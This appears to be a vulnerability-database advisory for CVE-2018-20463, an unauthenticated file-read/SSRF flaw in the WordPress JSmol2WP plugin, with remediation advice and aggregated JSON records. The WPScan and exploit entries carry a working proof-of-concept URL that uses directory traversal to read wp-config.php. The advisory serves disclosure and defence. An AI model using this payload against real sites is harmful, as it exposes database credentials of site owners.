Description
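An unauthenticated Server-Side Request Forgery (SSRF) vulnerability was found in the WordPress JSmol2WP plugin (versions <= 1.07). The related CVE-2018-20463 record classifies the same flaw as CWE-22: an arbitrary file read via `../` directory traversal in the `query` parameter of `jsmol.php`, which can also be used for SSRF. The impact therefore includes disclosure of local files readable by the web server, not only server-side requests.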
## Solution
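08.01.2019 - we were unable to find a patched version of this plugin. According to the WordPress.org plugin repository, this plugin was closed on January 7, 2019 and is no longer available for download. Because no fixed release exists, the remediation for sites that still have the plugin installed is to deactivate and remove it. As the related CVE record describes an unauthenticated file read, secrets held in the site's configuration files should be treated as potentially exposed and rotated.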
Affected Software
Related
{"id": "PATCHSTACK:990D0DA4B00AECF3F26E7A8815EB81D4", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress JSmol2WP plugin <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF) vulnerability", "description": "Unauthenticated Server Side Request Forgery (SSRF) vulnerability found in WordPress JSmol2WP plugin (versions <= 1.07).\n\n## Solution\n\n\r\n 08.01.2019 - we were unable to find a patched version of this plugin. According to WordPess.org plugin repository, this plugin was closed on January 7, 2019 and is no longer available for download.\r\n ", "published": "2019-01-08T00:00:00", "modified": "2019-01-08T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://patchstack.com/database/vulnerability/jsmol2wp/wordpress-jsmol2wp-plugin-1-07-unauthenticated-server-side-request-forgery-ssrf-vulnerability", "reporter": "N/A", "references": ["https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS", 
"https://wordpress.org/plugins/jsmol2wp/#developers"], "cvelist": ["CVE-2018-20463"], "immutableFields": [], "lastseen": "2022-06-01T19:37:34", "viewCount": 1, "enchantments": {"score": {"value": 3.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-20463"]}, {"type": "wpexploit", "idList": ["WPEX-ID:AD01DAD9-12FF-404F-8718-9EBBD67BF611"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:AD01DAD9-12FF-404F-8718-9EBBD67BF611"]}]}, "affected_software": {"major_version": [{"name": "jsmol2wp", "version": 1}]}, "vulnersScore": 3.6}, "_state": {"score": 1660007784, "dependencies": 1660004461, "affected_software_major_version": 1666695388}, "_internal": {"score_hash": "ab4516b101c26fc0553f69a92a32e5ab"}, "affectedSoftware": [{"version": "1.07", "operator": "le", "name": "jsmol2wp"}], "vendor_cvss": {"score": "3.1", "severity": "Unknown severity"}, "owasp": "A5: Security Misconfiguration", "classification": "Server Side Request Forgery (SSRF)"}
{"cve": [{"lastseen": "2022-03-23T15:51:32", "description": "An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-12-25T21:29:00", "type": "cve", "title": "CVE-2018-20463", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20463"], "modified": "2019-01-09T16:02:00", "cpe": ["cpe:/a:jsmol2wp_project:jsmol2wp:1.07"], "id": "CVE-2018-20463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20463", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*"]}], "wpvulndb": [{"lastseen": "2021-02-15T22:21:46", "bulletinFamily": "software", "cvelist": ["CVE-2018-20463"], "description": "The jsmol2wp WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.\n\n### 
PoC\n\nhttp://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call;=getRawDataFromDatabase&query;=php://filter/resource=../../../../wp-config.php\n", "modified": "2020-09-22T07:26:35", "published": "2018-12-25T00:00:00", "id": "WPVDB-ID:AD01DAD9-12FF-404F-8718-9EBBD67BF611", "href": "https://wpscan.com/vulnerability/ad01dad9-12ff-404f-8718-9ebbd67bf611", "type": "wpvulndb", "title": "JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "wpexploit": [{"lastseen": "2021-02-15T22:21:46", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-20463"], "description": "The jsmol2wp WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.\n", "modified": "2020-09-22T07:26:35", "published": "2018-12-25T00:00:00", "id": "WPEX-ID:AD01DAD9-12FF-404F-8718-9EBBD67BF611", "href": "", "type": "wpexploit", "title": "JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)", "sourceData": "http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}